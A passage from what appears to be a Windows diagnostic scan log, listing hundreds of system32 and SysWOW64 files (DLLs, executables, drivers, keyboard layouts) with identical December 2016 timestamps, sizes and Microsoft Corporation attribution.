2016-12-03 08:34 - 2016-12-03 08:34 - 00017408 _____ (Microsoft Corporation) C:\WINDOWS\system32\label.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00017408 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDCHERP.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00017408 _____ (Microsoft Corporation) C:\WINDOWS\system32\fsavailux.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00017408 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\rasacd.sys
2016-12-03 08:34 - 2016-12-03 08:34 - 00016896 _____ (Microsoft Corporation) C:\WINDOWS\system32\wsmplpxy.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00016896 _____ (Microsoft Corporation) C:\WINDOWS\system32\tcmsetup.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00016896 _____ (Microsoft Corporation) C:\WINDOWS\system32\subst.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00016896 _____ (Microsoft Corporation) C:\WINDOWS\system32\regidle.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00016896 _____ (Microsoft Corporation) C:\WINDOWS\system32\pstask.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00016896 _____ (Microsoft Corporation) C:\WINDOWS\system32\PerceptionSimulation.ProxyStubs.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00016896 _____ (Microsoft Corporation) C:\WINDOWS\system32\MUILanguageCleanup.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00016896 _____ (Microsoft Corporation) C:\WINDOWS\system32\LangCleanupSysprepAction.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00016896 _____ (Microsoft Corporation) C:\WINDOWS\system32\hnetmon.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00016896 _____ (Microsoft Corporation) C:\WINDOWS\system32\fhuxapi.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00016896 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpapi.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00016896 _____ (Microsoft Corporation) C:\WINDOWS\system32\clrhost.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00016740 _____ C:\WINDOWS\system32\ShiftJIS.uce
2016-12-03 08:34 - 2016-12-03 08:34 - 00016384 _____ (Microsoft Corporation) C:\WINDOWS\system32\snmptrap.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00016384 _____ (Microsoft Corporation) C:\WINDOWS\system32\pstorec.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00016384 _____ (Microsoft Corporation) C:\WINDOWS\system32\pcwrun.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00016384 _____ (Microsoft Corporation) C:\WINDOWS\system32\mmcico.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00016384 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapsBtSvcProxy.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00016384 _____ (Microsoft Corporation) C:\WINDOWS\system32\finger.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00016384 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\applockerfltr.sys
2016-12-03 08:34 - 2016-12-03 08:34 - 00016144 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\wmilib.sys
2016-12-03 08:34 - 2016-12-03 08:34 - 00015976 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\nsi.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00015976 _____ (Microsoft Corporation) C:\WINDOWS\system32\SlideToShutDown.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00015872 _____ (Microsoft) C:\WINDOWS\system32\djctq.rs
2016-12-03 08:34 - 2016-12-03 08:34 - 00015872 _____ (Microsoft Corporation) C:\WINDOWS\system32\wshirda.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00015872 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlanhlp.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00015872 _____ (Microsoft Corporation) C:\WINDOWS\system32\spwinsat.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00015872 _____ (Microsoft Corporation) C:\WINDOWS\system32\pnpts.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00015872 _____ (Microsoft Corporation) C:\WINDOWS\system32\msidcrl40.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00015872 _____ (Microsoft Corporation) C:\WINDOWS\system32\msfeedssync.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00015872 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDJPN.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00015872 _____ (Microsoft Corporation) C:\WINDOWS\system32\ifsutilx.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00015872 _____ (Microsoft Corporation) C:\WINDOWS\system32\dmiso8601utils.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00015872 _____ (Microsoft Corporation) C:\WINDOWS\system32\c_GSM7.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00015632 _____ (Microsoft Corporation) C:\WINDOWS\system32\backgroundTaskHost.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00015504 _____ (Microsoft Corporation) C:\WINDOWS\system32\psapi.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00015360 _____ (Microsoft) C:\WINDOWS\system32\pcbp.rs
2016-12-03 08:34 - 2016-12-03 08:34 - 00015360 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpPortingLibrary.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00015360 _____ (Microsoft Corporation) C:\WINDOWS\system32\TimeSyncTask.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00015360 _____ (Microsoft Corporation) C:\WINDOWS\system32\TapiUnattend.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00015360 _____ (Microsoft Corporation) C:\WINDOWS\system32\sas.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00015360 _____ (Microsoft Corporation) C:\WINDOWS\system32\RemoveDeviceElevated.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00015360 _____ (Microsoft Corporation) C:\WINDOWS\system32\panmap.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00015360 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshta.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00015360 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDKOR.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00015360 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\Dmpusbstor.sys
2016-12-03 08:34 - 2016-12-03 08:34 - 00015360 _____ (Microsoft Corporation) C:\WINDOWS\system32\dnsext.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00015360 _____ (Microsoft Corporation) C:\WINDOWS\system32\dmcommandlineutils.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00015360 _____ (Microsoft Corporation) C:\WINDOWS\system32\dhcpcmonitor.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00015360 _____ (Microsoft Corporation) C:\WINDOWS\system32\cfmifsproxy.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00015360 _____ (Microsoft Corporation) C:\WINDOWS\system32\browseui.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00015360 _____ (Microsoft Corporation) C:\WINDOWS\system32\amsiproxy.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00015120 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ntosext.sys
2016-12-03 08:34 - 2016-12-03 08:34 - 00015106 _____ C:\WINDOWS\system32\@WiFiNotificationIcon.png
2016-12-03 08:34 - 2016-12-03 08:34 - 00014952 _____ (Microsoft Corporation) C:\WINDOWS\system32\wshhyperv.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00014848 _____ (Microsoft Corporation) C:\WINDOWS\system32\wmcodecdspps.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00014848 _____ (Microsoft Corporation) C:\WINDOWS\system32\winrssrv.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00014848 _____ (Microsoft Corporation) C:\WINDOWS\system32\usbperf.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00014848 _____ (Microsoft Corporation) C:\WINDOWS\system32\SyncHostps.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00014848 _____ (Microsoft Corporation) C:\WINDOWS\system32\SensApi.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00014848 _____ (Microsoft Corporation) C:\WINDOWS\system32\HOSTNAME.EXE
2016-12-03 08:34 - 2016-12-03 08:34 - 00014848 _____ (Microsoft Corporation) C:\WINDOWS\system32\fdBthProxy.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00014848 _____ (Microsoft Corporation) C:\WINDOWS\system32\FamilySafetyExt.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00014848 _____ (Microsoft Corporation) C:\WINDOWS\system32\efsui.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00014848 _____ (Microsoft Corporation) C:\WINDOWS\system32\EasPolicyManagerBrokerPS.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00014848 _____ (Microsoft Corporation) C:\WINDOWS\system32\DockInterface.ProxyStub.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00014848 _____ (Microsoft Corporation) C:\WINDOWS\system32\DesktopView.Internal.Broker.ProxyStub.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00014848 _____ (Microsoft Corporation) C:\WINDOWS\system32\coreaudiopolicymanagerext.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00014848 _____ (Microsoft Corporation) C:\WINDOWS\system32\chcp.com
2016-12-03 08:34 - 2016-12-03 08:34 - 00014848 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppxStreamingDataSourcePS.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00014608 _____ (Microsoft Corporation) C:\WINDOWS\system32\setupetw.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00014336 _____ (Microsoft Corporation) C:\WINDOWS\system32\WSClient.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00014336 _____ (Microsoft Corporation) C:\WINDOWS\system32\verclsid.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00014336 _____ (Microsoft Corporation) C:\WINDOWS\system32\svsvc.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00014336 _____ (Microsoft Corporation) C:\WINDOWS\system32\SecondaryTileExperienceCallback.ProxyStub.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00014336 _____ (Microsoft Corporation) C:\WINDOWS\system32\recover.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00014336 _____ (Microsoft Corporation) C:\WINDOWS\system32\ReAgentTask.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00014336 _____ (Microsoft Corporation) C:\WINDOWS\system32\prflbmsg.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00014336 _____ (Microsoft Corporation) C:\WINDOWS\system32\mprext.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00014336 _____ (Microsoft Corporation) C:\WINDOWS\system32\GameBarPresenceWriter.proxy.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00014336 _____ (Microsoft Corporation) C:\WINDOWS\system32\Eap3Host.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00014336 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\registry.sys
2016-12-03 08:34 - 2016-12-03 08:34 - 00014336 _____ (Microsoft Corporation) C:\WINDOWS\system32\dabapi.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00014336 _____ (Microsoft Corporation) C:\WINDOWS\system32\C_ISCII.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00013968 _____ (Microsoft Corporation) C:\WINDOWS\system32\csrss.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00013824 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.BackgroundPlayback.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00013824 _____ (Microsoft Corporation) C:\WINDOWS\system32\TsUsbRedirectionGroupPolicyExtension.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00013824 _____ (Microsoft Corporation) C:\WINDOWS\system32\TetheringIeProvider.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00013824 _____ (Microsoft Corporation) C:\WINDOWS\system32\TapiSysprep.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00013824 _____ (Microsoft Corporation) C:\WINDOWS\system32\sscoreext.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00013824 _____ (Microsoft Corporation) C:\WINDOWS\system32\LogonUI.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00013824 _____ (Microsoft Corporation) C:\WINDOWS\system32\LAPRXY.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00013824 _____ (Microsoft Corporation) C:\WINDOWS\system32\InfDefaultInstall.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00013824 _____ (Microsoft Corporation) C:\WINDOWS\system32\dstokenclean.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00013824 _____ (Microsoft Corporation) C:\WINDOWS\system32\dllhst3g.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00013312 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\clrhost.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00013312 _____ (Microsoft Corporation) C:\WINDOWS\system32\WSHTCPIP.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00013312 _____ (Microsoft Corporation) C:\WINDOWS\system32\WalletBackgroundServiceProxy.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00013312 _____ (Microsoft Corporation) C:\WINDOWS\system32\txfw32.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00013312 _____ (Microsoft Corporation) C:\WINDOWS\system32\TCPSVCS.EXE
2016-12-03 08:34 - 2016-12-03 08:34 - 00013312 _____ (Microsoft Corporation) C:\WINDOWS\system32\netwphelper.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00013312 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\rootmdm.sys
2016-12-03 08:34 - 2016-12-03 08:34 - 00013312 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeviceUxRes.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00013312 _____ (Microsoft Corporation) C:\WINDOWS\system32\apprepapi.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00013312 _____ (Microsoft Corporation) C:\WINDOWS\system32\acproxy.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00013091 _____ C:\WINDOWS\system32\DevModeRunAsUserConfig.msc
2016-12-03 08:34 - 2016-12-03 08:34 - 00013072 _____ (Microsoft Corporation) C:\WINDOWS\system32\kd_07_1415.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00012876 _____ C:\WINDOWS\system32\korean.uce
2016-12-03 08:34 - 2016-12-03 08:34 - 00012800 _____ (Microsoft Corporation) C:\WINDOWS\system32\wship6.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00012800 _____ (Microsoft Corporation) C:\WINDOWS\system32\tapiperf.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00012800 _____ (Microsoft Corporation) C:\WINDOWS\system32\RemotePosWorker.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00012800 _____ (Microsoft Corporation) C:\WINDOWS\system32\provdiagnostics.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00012800 _____ (Microsoft Corporation) C:\WINDOWS\system32\pcaevts.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00012800 _____ (Microsoft Corporation) C:\WINDOWS\system32\msrating.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00012800 _____ (Microsoft Corporation) C:\WINDOWS\system32\msiwer.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00012800 _____ (Microsoft Corporation) C:\WINDOWS\system32\msidle.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00012800 _____ (Microsoft Corporation) C:\WINDOWS\system32\iscsied.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00012800 _____ (Microsoft Corporation) C:\WINDOWS\system32\dvdplay.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00012800 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mstee.sys
2016-12-03 08:34 - 2016-12-03 08:34 - 00012800 _____ (Microsoft Corporation) C:\WINDOWS\system32\DefaultDeviceManager.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00012800 _____ (Microsoft Corporation) C:\WINDOWS\system32\appinfoext.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00012560 _____ (Microsoft Corporation) C:\WINDOWS\system32\spwizres.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00012560 _____ (Microsoft Corporation) C:\WINDOWS\system32\kdnet_uart16550.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00012360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wshhyperv.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00012288 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PerceptionSimulation.ProxyStubs.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00012288 _____ (Microsoft Corporation) C:\WINDOWS\system32\WiaExtensionHost64.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00012288 _____ (Microsoft Corporation) C:\WINDOWS\system32\TimeDateMUICallback.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00012288 _____ (Microsoft Corporation) C:\WINDOWS\system32\spnet.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00012288 _____ (Microsoft Corporation) C:\WINDOWS\system32\regedt32.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00012288 _____ (Microsoft Corporation) C:\WINDOWS\system32\mscat32.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00012288 _____ (Microsoft Corporation) C:\WINDOWS\system32\MinstoreEvents.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00012288 _____ (Microsoft Corporation) C:\WINDOWS\system32\microsoft-windows-battery-events.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00012288 _____ (Microsoft Corporation) C:\WINDOWS\system32\iprtprio.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00012288 _____ (Microsoft Corporation) C:\WINDOWS\system32\help.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00012288 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mshidumdf.sys
2016-12-03 08:34 - 2016-12-03 08:34 - 00012288 _____ (Microsoft Corporation) C:\WINDOWS\system32\dcomcnfg.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00011776 _____ (Microsoft Corporation) C:\WINDOWS\write.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00011776 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuapihost.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00011776 _____ (Microsoft Corporation) C:\WINDOWS\system32\write.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00011776 _____ (Microsoft Corporation) C:\WINDOWS\system32\WppRecorderUM.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00011776 _____ (Microsoft Corporation) C:\WINDOWS\system32\systray.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00011776 _____ (Microsoft Corporation) C:\WINDOWS\system32\spmpm.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00011776 _____ (Microsoft Corporation) C:\WINDOWS\system32\SEMgrSvcPAL.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00011776 _____ (Microsoft Corporation) C:\WINDOWS\system32\ResetEngine.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00011776 _____ (Microsoft Corporation) C:\WINDOWS\system32\Locator.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00011776 _____ (Microsoft Corporation) C:\WINDOWS\system32\getuname.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00011776 _____ (Microsoft Corporation) C:\WINDOWS\system32\acledit.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00011536 _____ (Microsoft Corporation) C:\WINDOWS\system32\kd.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00011392 _____ (Microsoft Corporation) C:\WINDOWS\system32\iumdll.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00011264 _____ (Microsoft Corporation) C:\WINDOWS\system32\XInput9_1_0.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00011264 _____ (Microsoft Corporation) C:\WINDOWS\system32\softpub.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00011264 _____ (Microsoft Corporation) C:\WINDOWS\system32\shfolder.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00011264 _____ (Microsoft Corporation) C:\WINDOWS\system32\plasrv.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00011264 _____ (Microsoft Corporation) C:\WINDOWS\system32\Nlsdl.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00011264 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetHost.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00011264 _____ (Microsoft Corporation) C:\WINDOWS\system32\DMAlertListener.ProxyStub.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00010752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wmcodecdspps.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00010752 _____ (Microsoft Corporation) C:\WINDOWS\system32\WebCache.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00010752 _____ (Microsoft Corporation) C:\WINDOWS\system32\RpcNs4.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00010752 _____ (Microsoft Corporation) C:\WINDOWS\system32\OskSupport.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00010752 _____ (Microsoft Corporation) C:\WINDOWS\system32\mssip32.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00010752 _____ (Microsoft Corporation) C:\WINDOWS\system32\kbdnecat.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00010752 _____ (Microsoft Corporation) C:\WINDOWS\system32\idndl.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00010752 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mspqm.sys
2016-12-03 08:34 - 2016-12-03 08:34 - 00010752 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mspclock.sys
2016-12-03 08:34 - 2016-12-03 08:34 - 00010752 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnsvr.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00010752 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnlobby.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00010752 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnhupnp.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00010752 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnhpast.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00010752 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnet.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00010752 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnathlp.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00010752 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnaddr.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00010752 _____ (Microsoft Corporation) C:\WINDOWS\system32\comcat.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00010540 _____ C:\WINDOWS\system32\TransformPPSToWlan.xslt
2016-12-03 08:34 - 2016-12-03 08:34 - 00010240 _____ C:\WINDOWS\system32\VpnSohDesktop.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00010240 _____ (Microsoft Corporation) C:\WINDOWS\system32\osuninst.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00010240 _____ (Microsoft Corporation) C:\WINDOWS\system32\mtxex.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00010240 _____ (Microsoft Corporation) C:\WINDOWS\system32\lpksetupproxyserv.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00010240 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDHEPT.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00010240 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\beep.sys
2016-12-03 08:34 - 2016-12-03 08:34 - 00009926 _____ C:\WINDOWS\SysWOW64\l_intl.nls
2016-12-03 08:34 - 2016-12-03 08:34 - 00009926 _____ C:\WINDOWS\system32\l_intl.nls
2016-12-03 08:34 - 2016-12-03 08:34 - 00009728 _____ (Microsoft Corporation) C:\WINDOWS\system32\wscadminui.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00009728 _____ (Microsoft Corporation) C:\WINDOWS\system32\Microsoft-Windows-MosTrace.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00009728 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDUS.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00009216 _____ (Microsoft Corporation) C:\WINDOWS\system32\Microsoft-Windows-MosHost.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00009216 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDYCL.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00009216 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDSMSNO.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00009216 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDSMSFI.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00009216 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDRUM.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00009216 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDROST.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00009216 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDROPR.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00009216 _____ (Microsoft Corporation) C:\WINDOWS\system32\kbdnecnt.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00009216 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDLVST.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00009216 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDINEN.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00009216 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDCAN.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00009129 _____ C:\WINDOWS\system32\ResPriHMImageList
2016-12-03 08:34 - 2016-12-03 08:34 - 00008704 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDUKX.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00008704 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDTUF.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00008704 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDTIPRD.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00008704 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDTIPRC.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00008704 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDSORST.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00008704 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDSOREX.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00008704 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDSL1.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00008704 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDSG.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00008704 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDRO.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00008704 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDNSO.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00008704 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDNO1.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00008704 _____ (Microsoft Corporation) C:\WINDOWS\system32\kbdnec95.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00008704 _____ (Microsoft Corporation) C:\WINDOWS\system32\kbdnec.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00008704 _____ (Microsoft Corporation) C:\WINDOWS\system32\kbdlk41a.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00008704 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDINUK2.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00008704 _____ (Microsoft Corporation) C:\WINDOWS\system32\kbdibm02.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00008704 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDGRLND.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00008704 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDFI1.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00008704 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDCZ2.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00008704 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDCZ1.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00008704 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDCZ.DLL
